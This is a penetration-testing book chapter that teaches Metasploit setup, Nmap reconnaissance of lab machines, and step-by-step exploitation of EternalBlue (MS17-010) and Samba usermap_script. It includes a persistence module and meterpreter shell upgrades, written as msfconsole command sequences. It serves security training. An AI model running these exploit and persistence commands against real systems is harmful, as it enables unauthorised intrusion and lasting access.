Before we can get our hands dirty with privilege escalation on both Windows and Linux, we need to explore the process of exploitation and the various exploitation techniques that can be leveraged, including how these techniques will affect the privilege escalation process.
Exploitation is a unique phase of the penetration testing life cycle. This is because it involves actively engaging with the target to determine or discover flaws or vulnerabilities that can be exploited in order to gain access.
Exploitation sets the scene for a successful penetration test and validates how far you will be able to get on a target system or network. Choosing the correct attack vector and exploitation framework or exploit is critical for gaining and maintaining access to a target system.
In this chapter, you will learn about the various ways of exploiting both Windows and Linux systems and how to leverage exploitation frameworks such as Metasploit.
In this chapter, we will cover the following topics:
To follow along with the demonstrations in this chapter, you need to ensure that you meet the following technical requirements:
You can view this chapter's code in action here: https://bit.ly/3m5qIaI
The Metasploit framework is an open source exploitation framework developed by H.D. Moore. It was originally written in Perl and later rewritten in Ruby. It is the de facto exploitation framework adopted by security professionals worldwide. It was acquired by Rapid7, in 2009, and is actively maintained and supported.
It was designed to streamline and enhance the penetration testing process. It does this by offering compartmentalized functionality in the form of modules based on various phases of the penetration testing methodology.
Metasploit can be used in almost every stage of the penetration testing life cycle, from information gathering to exploitation and privilege escalation. This robust functionality is what makes Metasploit an essential framework to learn for any penetration tester.
Metasploit has two versions available that offer varying functionality and features:
During the course of this book, we will be utilizing the Metasploit framework version of Metasploit.
Before we can begin setting up and using the Metasploit framework, first, we need to understand exactly how it is structured. Figure 3.1 outlines the components that make up the Metasploit framework and provides a high-level overview of how these components interact with each other:
Given the subject matter of this book, we will not be taking a detailed look at how each of these components works and what their purpose is. Instead, we will focus on the most important element of the Metasploit framework in relation to exploitation, that is, the modules.
Important note
The Metasploit framework comes prepackaged. It is installed on Kali Linux and is also available in the official Kali repositories. As a result, we will not be discussing how to install Metasploit manually.
The best way to understand how Metasploit modules are structured is to browse through the directory on Kali Linux. The default Metasploit framework directory is located under /usr/share/metasploit-framework, and you can list the contents of the directory by running the following command:
ls -al /usr/share/metasploit-framework
Figure 3.2 outlines the contents of the default Metasploit framework directory on Kali Linux. As you can see, the directory contains binaries and directories based on their functionality. For example, we can see the msfdb binary that is responsible for interacting with the Metasploit framework database, and we can also see that the modules have been sorted into their own directory:
In the next section, we will take a look at how modules are further organized based on their type.
Given the compartmentalized nature of the framework, Metasploit utilizes modules to segregate functionality. It does this by categorizing modules based on their specific functionality in respect to the role they play in the penetration testing life cycle. You can access this by viewing the contents of the module's directory under /usr/share/metasploit/framework/modules, as shown in Figure 3.3:
The modules and their functionality are sorted as follows:
a) Privilege escalation
b) Credential harvesting and dumping hashes
c) Capturing user input on the target system
d) Executing processes and binaries
e) Setting up persistence
Now that we have familiarized ourselves with the various modules available in the Metasploit framework, we can begin setting up and configuring the Metasploit framework to use.
To begin using the Metasploit framework, we will need to create and initialize the Metasploit database. You will need to perform the following steps:
sudo systemctl start postgresql
sudo msfdb init
The initialization process will create the msf database and add the msf_test role to the database configuration.
msfconsole
As you can see, in Figure 3.4, starting msfconsole will take a few seconds:
db_status
As you can see, in Figure 3.6, the output informs us that msfconsole is connected to the database:
The Metasploit framework should now be fully functional and ready to use. We can now move on to the next phase, which involves performing footprinting and active reconnaissance on our target virtual machines.
Before we can exploit a target system, we need to accurately enumerate in order to retrieve important information from our targets. This phase of the penetration testing life cycle involves scanning and discovering hosts on a network. We scan these hosts to find the open ports and services that are running along with their versions. Additionally, we identify what operating systems the targets are running.
This is one of the most important phases of a penetration test, as it will determine the overall success of the exploitation phase. If we can gather and enumerate enough information from our targets, we can set up effective attacks and exploits. However, if we don't do this, our exploitation methods will be inefficient and may not yield any results.
We will begin the footprinting process by mapping out our virtual network to discover the target virtual machines and their corresponding IP addresses.
Network Mapper (Nmap) is a free, open source network mapping utility that is used to discover hosts on a network, perform port scanning and service detection, and operate system detection. It does this by sending specially crafted packets to the targets and analyzing the responses that are sent from the target. Based on these responses, Nmap makes decisions as to whether a port is open, a target is online, or a firewall is in place.
We will be using Nmap in conjunction with Metasploit, where we will import our Nmap scan results into the Metasploit framework database. Nmap can generate output in a wide variety of formats. In our case, we will be exporting our scan results in XML format so that we can import them into the Metasploit database.
Ensure that you have the following target virtual machines running, as we will be utilizing them in this chapter:
Now that we have a clear picture of what hosts we will be targeting, we can begin the host discovery process with Nmap.
The first step in footprinting is to discover the active hosts on a network and their corresponding IP addresses. Following this, we will scan these hosts individually to discover open ports, the services running, and the operating system that is being used:
sudo nmap -sn 10.10.10.1/24
As you can see, in Figure 3.7, we have four active hosts on our network. However, we still do not know what operating systems these hosts are running, making it very difficult to identify what IP addresses correspond to our virtual machines:
This Nmap scan will send ping requests to all hosts on the network and will determine whether a host is online based on the responses it receives.
sudo nmap -A -T4 10.10.10.1/24
This scan will reveal the target operating system, the services running, the service versions, and the open ports running on the target systems. For instance, you should be able to determine what operating system a host is running by analyzing the operating system scan discovery results. Figure 3.8 outlines the OS discovery results for the virtual machine with an IP address of 10.10.10.7. As you can see, the OS discovery results indicate that the host is running Windows Server 2008 SP1, which means it is the Metasploitable3 virtual machine:
Note
You can also scan for specific information such as the operating system and service information by using the -O flag and the -sV flag.
Given the infrastructure of our virtual network and the use of Dynamic Host Configuration Protocol (DHCP), your virtual machine IP addresses might be assigned differently in comparison to the scenario here. In this case, the IP addresses correspond to the following hosts:
a) Metasploitable3: 10.10.10.4
b) Metasploitable2: 10.10.10.8
c) Windows 7: 10.10.10.7
Now that we have mapped out the hosts on our network, we can perform our individual scans on all the hosts on the network to determine what services are running and what ports are open.
sudo nmap -sS -A -T4 -p- <IP-ADDRESS> -oX output_file.xml
Important note
You will need to run this scan for all target virtual machines on the virtual network to determine what ports are open and what services are running. We will use this information in the next section, which involves performing a vulnerability analysis to determine potential vulnerabilities that can be exploited.
db_import /home/kali/Desktop/outpute_file.xml
This will import the scan results, and msfconsole will automatically add the target specified in the scan as a host, as demonstrated in the following screenshot:
After importing the scan results, we can perform a vulnerability analysis on these results to identify potentially exploitable vulnerabilities. This process is extremely important as it will determine our chances of successful exploitation.
Vulnerability assessment is the process of identifying, quantifying, and prioritizing vulnerabilities within a system. This process can be automated through the use of vulnerability scanning systems such as OpenVAS and Nessus. However, automated vulnerability scans do not actively exploit vulnerabilities on systems, they only report them. This is where penetration tests come in. As a penetration tester, you will not only need to discover vulnerabilities but actively attempt to exploit them to verify their severity and risk.
Therefore, it is important, as a penetration tester, to learn how to perform manual vulnerability assessments on your targets as opposed to relying on automated vulnerability scanning tools. The ability to actively scan and detect vulnerabilities manually is an essential skill.
Based on the results we have gathered from our targets in the footprinting phase, we can begin the process of identifying vulnerabilities by closely examining the operating systems and services that are running on the target virtual machines.
We can begin analyzing the Nmap results for the Metasploitable3 virtual machine in msfconsole:
hosts -u
Figure 3.10 outlines all of the active hosts that we imported from our Nmap scan results. As you can see, msfconsole lists the target IP addresses and OS name. This information is useful; however, we need to identify the operating system and service versions:
services <IP-ADDRESS>
As outlined in Figure 3.11, we can identify that the operating system version is Windows Server 2008 R2, Service Pack 1:
After some quick Google searching, I can identify an unpatched vulnerability in the operating system.
You can search for service and operating system-specific vulnerabilities through search engines such as Google. This process can be fine-tuned through the use of specific search engine operators, as demonstrated in Figure 3.12:
This particular version of Windows Server 2008 is vulnerable to the MS17-010 vulnerability, which is code-named EternalBlue. For more information about this vulnerability, please refer to https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010. EternalBlue is an exploit that allows attackers to remotely execute arbitrary code by exploiting a vulnerability in Microsoft's Server Message Block (SMB) V1 protocol.
search eternalblue
As you can see, in Figure 3.13, this will display multiple modules matching the search term of eternalblue. However, we want to select the auxiliary module that will identify whether our target is vulnerable or not:
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <IP-ADDRESS>
run
As demonstrated in Figure 3.15, our Metasploitable3 virtual machine is vulnerable to the EternalBlue exploit:
We have now identified and confirmed a potential vulnerability that could provide us with remote access to the target if successfully exploited. In the next section, we will take a look at the exploitation phase.
Similar to Metasploitable3, we can analyze the Nmap results that we imported for the Metasploitable2 virtual machine in msfconsole. Let's perform the following steps:
services <IP-ADDRESS>
As you can see, in Figure 3.16, Metasploitable2 has services running. Most of these are outdated given the service versions. We can also deduce that the server is running an older version of Ubuntu:
searchsploit <Service Name & Version>
Note
Searchsploit is a utility that allows you to search for exploits available on exploit-db without having to directly access the exploit-db website manually.
searchsploit samba 3.0.20
Figure 3.17 outlines the various exploits available for Samba smbd V3.0.20. We will be using the second exploit, which has a Metasploit module available:
Now that we have identified a potential exploit on our target systems, we can take a look at how to use the utilize exploit modules to gain access.
We can now get started with exploitation, which is the most exciting phase of the penetration testing life cycle. We have already identified our potential exploits on our target systems; therefore, we now need to run and test these exploits to gain our initial foothold.
The objective of the exploitation phase is to gain stable and persistent access to the target system, which will ensure that once a system is exploited, we will have persistent access even if the system is restarted.
In the previous section, we were able to identify and verify the EternalBlue exploit as a potential access vector inside the Metasploitable3 host. Let's take a look at how we can use this exploit to gain access:
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <IP-ADDRESS>
run
What is meterpreter?
Meterpreter is an advanced payload that uses in-memory Dynamic Link Library (DLL) injection and provides attackers with an advanced interactive shell that can be used to explore the target system, run system commands, and execute code.
background
Figure 3.21 outlines a list of active meterpreter sessions and their corresponding details:
use exploit/windows/local/persistence
set SESSION 1
Additionally, we need to change the payload option, in particular, the LPORT option, this can be done by running the following command:
set LPORT 4443
Figure 3.22 outlines the various options available for the persistence module. The highlighted options are the values that need to be changed:
run
We have successfully exploited and set up persistence on our Metasploitable3 host. Next, we will look at how to exploit Metasploitable2, which is our Linux host.
In the Information gathering and footprinting section, we were able to identify an exploit for the Samba smbd 3.0.20 service. Let's take a look at how we can use this exploit to gain access:
search samba 3.0.20
use exploit/multi/samba/usermap_script
set RHOSTS <IP-ADDRESS>
run
use post/multi/manage/shell_to_meterpreter
set SESSION 1
Additionally, we can change the payload option, LPORT, by running the following command:
set LPORT 4443
Figure 3.28 outlines the options available for the shell_to_meterpreter module:
run
sessions 2
We have now been able to successfully exploit a Windows and Linux host via different exploitation vectors to gain our initial foothold onto the system. We are now ready to begin the privilege escalation process.
In this chapter, we started by familiarizing ourselves with the structure of the Metasploit framework. We then looked at how to perform both footprinting and vulnerability analyses on our targets with Nmap and Metasploit. We then ended the chapter by exploring how to use the information we gathered during footprinting to successfully exploit a Windows and Linux host through the operating system and service vulnerabilities.
Now that we have learned how to establish our initial foothold on the system, we can learn how to perform local system enumeration.
In the next chapter, we will discover the various tools and techniques that we can use to enumerate information from our target systems and explore how to use this information to stage a privilege escalation attack.
18.217.5.86